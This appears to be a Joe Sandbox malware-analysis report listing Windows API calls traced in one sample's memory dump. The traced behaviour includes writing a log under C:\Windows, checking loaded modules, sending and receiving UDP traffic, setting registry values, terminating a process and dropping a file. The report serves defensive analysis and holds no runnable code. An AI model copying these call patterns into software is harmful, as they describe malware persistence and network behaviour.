                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcat$lstrlen$ExchangeInterlockedlstrcpy
                                                                                                                                                                                                                                    • String ID: %s
                                                                                                                                                                                                                                    • API String ID: 3361872186-3043279178
                                                                                                                                                                                                                                    • Opcode ID: e4d933abe980d7cd3b2abc05129fae78ab57546ec1c20db2411753673a0ae98c
                                                                                                                                                                                                                                    • Instruction ID: 8dd94349cb791324bdb2fc94b0c49316201b56e760ef5427ac372724de642d9b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4d933abe980d7cd3b2abc05129fae78ab57546ec1c20db2411753673a0ae98c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7061B5B6910159EBDF24EF68E8857ED77B5EF9C300F1081A8D609D32C4D7389A558FA0
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(C:\Windows\mqiwauwsp.log,40000000,00000002,00000000,00000004,00000080,00000000,?), ref: 01285507
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,C:\Windows\mqiwauwsp.log), ref: 0128553A
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0128554E
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,01286958,00000000,?,00000000), ref: 01285599
                                                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(000000FF), ref: 012855A6
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 012855B3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWritelstrcpylstrlen
                                                                                                                                                                                                                                    • String ID: C:\Windows\mqiwauwsp.log
                                                                                                                                                                                                                                    • API String ID: 3630773104-564371081
                                                                                                                                                                                                                                    • Opcode ID: d2edc02996c1977d4d6438b3ade4c8c87f0c703461184ce084500837129a1231
                                                                                                                                                                                                                                    • Instruction ID: 1d25f1f3bcf8ab6ed369bba75209bd790b13871800f6f5ee86fe8cf2a8ed50a8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2edc02996c1977d4d6438b3ade4c8c87f0c703461184ce084500837129a1231
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 513196B5900318ABDB20DB54DC4DFDAB778AB98700F0086D8E219A72D1DBB46AD4CF90
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,?,?), ref: 01289BA2
• Module32First.KERNEL32(?,00000224), ref: 01289BC5
• CharUpperA.USER32(?,00000008,?,?), ref: 01289BDE
• Module32Next.KERNEL32(?,00000224), ref: 01289C2E
• CloseHandle.KERNEL32(?,00000008,?,?), ref: 01289C3E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: Module32$CharCloseCreateFirstHandleNextSnapshotToolhelp32Upper
• String ID: DWEBIO$DWEBLLIO
• API String ID: 3788218250-3981995823
• Opcode ID: f307851de9abb654a8087ea454fccd6387bfa1d0abd05c8e031b250000012842
• Instruction ID: 7e9b22b7c94502aff41996e36f7baf92fdf08ce858bb278c84c8ab8e77ef6446
• Instruction Fuzzy Hash: 60216671911219ABDF20FBA8ED58BEAB7F8AF5C304F4045D9D608A2180DB75EAC4CF51
APIs
• htons.WS2_32(?), ref: 0128785A
  • Part of subcall function 0128719B: socket.WS2_32(00000002,00000002,00000011), ref: 01287203
  • Part of subcall function 0128719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0128726D
  • Part of subcall function 0128719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 01287345
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 012878CA
• htons.WS2_32(?), ref: 012878E2
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 01287940
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 012879DC
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 01287A19
  • Part of subcall function 01286330: RtlEnterCriticalSection.NTDLL(01299050), ref: 012863CD
  • Part of subcall function 01286330: RtlLeaveCriticalSection.NTDLL(01299050), ref: 01286960
• GlobalFree.KERNEL32(00000000), ref: 01287A23
• RtlExitUserThread.NTDLL(00000000), ref: 01287A2B
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: sendto$CriticalSectionhtons$EnterExitFreeGlobalLeaveThreadUserselectsocket
• String ID:
• API String ID: 4130859867-0
• Opcode ID: 4749790e580a96e71eb856f1123dc8bfb8cb379f409ce3a1df357e5920d75eb3
• Instruction ID: d4e4bf6a803e7e967d55857113780c47e0fc364655b4aa10ceaaa7ac3fc36e95
• Instruction Fuzzy Hash: 8A918171E10205BBEB14EBA8C895FEEF7B5EF48700F248598E615AB2C1D7759A40CB50
APIs
  • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
• lstrcpy.KERNEL32(00000000,00000000), ref: 01292D24
• lstrcat.KERNEL32(00000000,01283DFC), ref: 01292D86
• lstrcat.KERNEL32(00000000,01283E00), ref: 01292D98
• lstrcat.KERNEL32(00000000,01283E04), ref: 01292DC1
• lstrlen.KERNEL32(00000000,%s,01293658,?,?,?,?,?,?), ref: 01292DD7
• wsprintfA.USER32 ref: 01292DE5
• lstrcat.KERNEL32(?,00000000), ref: 01292DF9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: lstrcat$ExchangeInterlockedlstrcpylstrlenwsprintf
• String ID: %s
• API String ID: 3923932729-3043279178
• Opcode ID: 164b8d7ee2244dc15951fa25434d196b472e9bdd5be09211273dc8aa4271d9bc
• Instruction ID: 57e4dedf56f5c6615b71806b90273f4538e16336b33de7f7d32cc5d9988e134a
• Instruction Fuzzy Hash: 3C31C476A20119EBDF24EF68ED45BF93375AF9C700F1085A8E609D21C4D634DA95CFA0
APIs
• GetTickCount.KERNEL32 ref: 0128A6E6
• lstrlen.KERNEL32(?,012826B8,00000000), ref: 0128A6F8
• wsprintfA.USER32 ref: 0128A704
• GetTickCount.KERNEL32 ref: 0128A6C5
  • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
• GetTickCount.KERNEL32 ref: 0128A70F
• GetTickCount.KERNEL32 ref: 0128A730
• lstrlen.KERNEL32(?,012826B0,00000000), ref: 0128A742
• wsprintfA.USER32 ref: 0128A74E
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CountTick$lstrlenwsprintf$ExchangeInterlocked
• String ID:
• API String ID: 2702386088-0
• Opcode ID: 8e2211b9f323ac01be9ebfa3f98d6601633bca2a03d6a7cbf70eb85ce92ab24b
• Instruction ID: 6ce7f0031bb061c1f59b1be5d44e7955d4c0f9879ab8605bf9b3edf87e01f7a6
• Instruction Fuzzy Hash: A421D876611101ABD728BB78EC0DEBA37A8EF88241B048465FE09C32D4DA35E92087E0
APIs
• GetTempPathA.KERNEL32(00000080,00000000,?), ref: 0128A78C
• lstrlen.KERNEL32(00000000), ref: 0128A796
• lstrcat.KERNEL32(00000000,01283CC0), ref: 0128A7B2
• lstrcpy.KERNEL32(00000000,00000000), ref: 0128A7CF
• lstrlen.KERNEL32(00000000,01282880,00000000), ref: 0128A7FD
• wsprintfA.USER32 ref: 0128A809
• lstrlen.KERNEL32(00000000,0128288C,00000000), ref: 0128A826
• wsprintfA.USER32 ref: 0128A832
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: lstrlen$wsprintf$PathTemplstrcatlstrcpy
• String ID:
• API String ID: 2776683041-0
APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 01286F1C
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 01286F7A
• select.WS2_32(?,00000000,00000000,00000000,00000014), ref: 01287052
• recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 01287081
• closesocket.WS2_32(?), ref: 01287185
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: closesocketrecvfromselectsendtosocket
• String ID: @
• API String ID: 4198204009-2766056989
APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 01287580
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 012875D1
• select.WS2_32(?,00000000,00000000,00000000,0000001E), ref: 012876A9
• recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 012876D8
• closesocket.WS2_32(000000FF), ref: 01287768
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: closesocketrecvfromselectsendtosocket
• String ID: @
• API String ID: 4198204009-2766056989
APIs
• lstrlen.KERNEL32(00000000), ref: 01292A4E
  • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
• lstrcat.KERNEL32(00000000,01283DE0), ref: 01292A7C
• lstrcat.KERNEL32(00000000,01283DE4), ref: 01292AA2
• lstrcat.KERNEL32(00000000,01283DE8), ref: 01292AB1
• lstrlen.KERNEL32(00000000), ref: 01292B0C
• lstrcat.KERNEL32(00000000,01283DEC), ref: 01292B40
• lstrcat.KERNEL32(00000000,01283DF0), ref: 01292B66
• lstrcat.KERNEL32(00000000,01283DF4), ref: 01292B83
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: lstrcat$lstrlen$ExchangeInterlocked
• String ID:
• API String ID: 3054446656-0
APIs
• CreateFileA.KERNEL32(012826E0,40000000,00000000,00000000,00000003,00000000,00000000,?,01289E89), ref: 01289AF1
• OpenProcess.KERNEL32(001F0FFF,00000000,000000FF), ref: 01289B0B
• TerminateProcess.KERNEL32(00000000,00000000), ref: 01289B20
• CloseHandle.KERNEL32(00000000), ref: 01289B2A
• WriteFile.KERNEL32(000000FF,000000FF,00000004,00000000,00000000), ref: 01289B42
• CloseHandle.KERNEL32(000000FF), ref: 01289B4C
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CloseFileHandleProcess$CreateOpenTerminateWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2603052737-0
                                                                                                                                                                                                                                    • Opcode ID: e9ad6567e78db4a78d61dedc91907e8c7b8834db17222e61b25cbffddd3ea6ff
                                                                                                                                                                                                                                    • Instruction ID: 932a0b2219404bff7fb2d06c2f0154c70cec79ee132b0be5b209f5f006c059f8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9ad6567e78db4a78d61dedc91907e8c7b8834db17222e61b25cbffddd3ea6ff
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0015B74A40208FBEB20DFE0EC4DF9D7B78AB88700F108184F711A62D0D7B06684DB50
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01284F6B
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 01284FFF
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 01285021
                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 0128504B
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 0128505A
                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 0128507A
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0128508C
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 01285100
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01285153
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 0128518F
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0128543A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value$Closelstrcpywsprintf$FreeGlobalQuerylstrlen
                                                                                                                                                                                                                                    • String ID: fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 3359840872-3143526458
                                                                                                                                                                                                                                    • Opcode ID: a070c2d49128730578442266e62b68f6328633ab027a3882ee4beeb3c410040c
                                                                                                                                                                                                                                    • Instruction ID: 72825f3eb68f437951b350e8f5d18aa87c520b9dccee210832f950edbc2e39ec
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a070c2d49128730578442266e62b68f6328633ab027a3882ee4beeb3c410040c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB4191B5826128DBCB30EF50DC46FE9B775BB58305F0882CAE51966281DAB25B88CF50
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 01287FA9: select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 012880DA
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,-00000C00), ref: 012881A1
                                                                                                                                                                                                                                    • recv.WS2_32(?,00000008,00000400,00000000), ref: 012881F0
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 01288247
                                                                                                                                                                                                                                    • send.WS2_32(?,00000000,?,00000000), ref: 0128826D
                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 01288283
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Global$AllocFreeclosesocketrecvselectsend
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 424924859-0
                                                                                                                                                                                                                                    • Opcode ID: 67fde1d75f6742715a10b706d9f8f539b7a1615e35624793820447a19246d7b0
                                                                                                                                                                                                                                    • Instruction ID: 217ec062f7c35bddce376c597c85877681d9acb404e5c26450f48def935a5ab1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67fde1d75f6742715a10b706d9f8f539b7a1615e35624793820447a19246d7b0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC419F70911209EFDF24EB98CC48BE9B7B9BB94305F44C198E648A72C4DB74AA84CF50
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(00000000,00000080), ref: 01289322
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 0128932F
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283C90), ref: 0128934E
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01282288), ref: 01289362
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,0128268C), ref: 01289375
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcat$DirectorySystemlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3692445580-0
                                                                                                                                                                                                                                    • Opcode ID: a7fa01e4fef9255b7d3c6faebcf2b6c429f5780b752d711401934f6b02f0a369
                                                                                                                                                                                                                                    • Instruction ID: 80925d157b5b94a42a545963ed9fdfe0c74766bcdcb813a2ef9f6d121bbcc397
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7fa01e4fef9255b7d3c6faebcf2b6c429f5780b752d711401934f6b02f0a369
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E2162B9A10214AFDF20DB68EC4DBA97778BB88705F008198F709A31C4CB706A95CF64
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001000), ref: 0128945E
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000080), ref: 0128947B
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 01289495
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0002D000), ref: 012894BF
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 012894EC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: Sleep$ExitThreadUserlstrlen
• String ID:
• API String ID: 3026710222-0
• Opcode ID: f57d0695c7e600b21c3c3823027180130fcbc80bd780dcf4c19346f8ebccc457
• Instruction ID: 948ad9497ba417a8c54a11f0e90f555fb104da094c6e8164e47ea608a82d413d
• Opcode Fuzzy Hash: f57d0695c7e600b21c3c3823027180130fcbc80bd780dcf4c19346f8ebccc457
• Instruction Fuzzy Hash: B8219570A54308DBEF10DFD8EC09BAEB7B4FB89759F108119E515A63C4C7B96450CBA0
APIs
• lstrlen.KERNEL32(?), ref: 01290C6E
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000022,00000000), ref: 01290CA0
• WriteFile.KERNEL32(?,00F423D8,0001E200,?,00000000), ref: 01290CC6
• CloseHandle.KERNEL32(?), ref: 01290CD0
• GetFileAttributesA.KERNEL32(?), ref: 01290CDA
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: File$AttributesCloseCreateHandleWritelstrlen
• String ID:
• API String ID: 96072700-0
• Opcode ID: a4a7dc642370d7071dbea88f2ba4310cecfbf74c713a9dcdf868063a0e44ce81
• Instruction ID: 71f7e6514b71a1bb7791aa4c347c40cbebfa6455abab6a1b4c1ebe9d5dcd1717
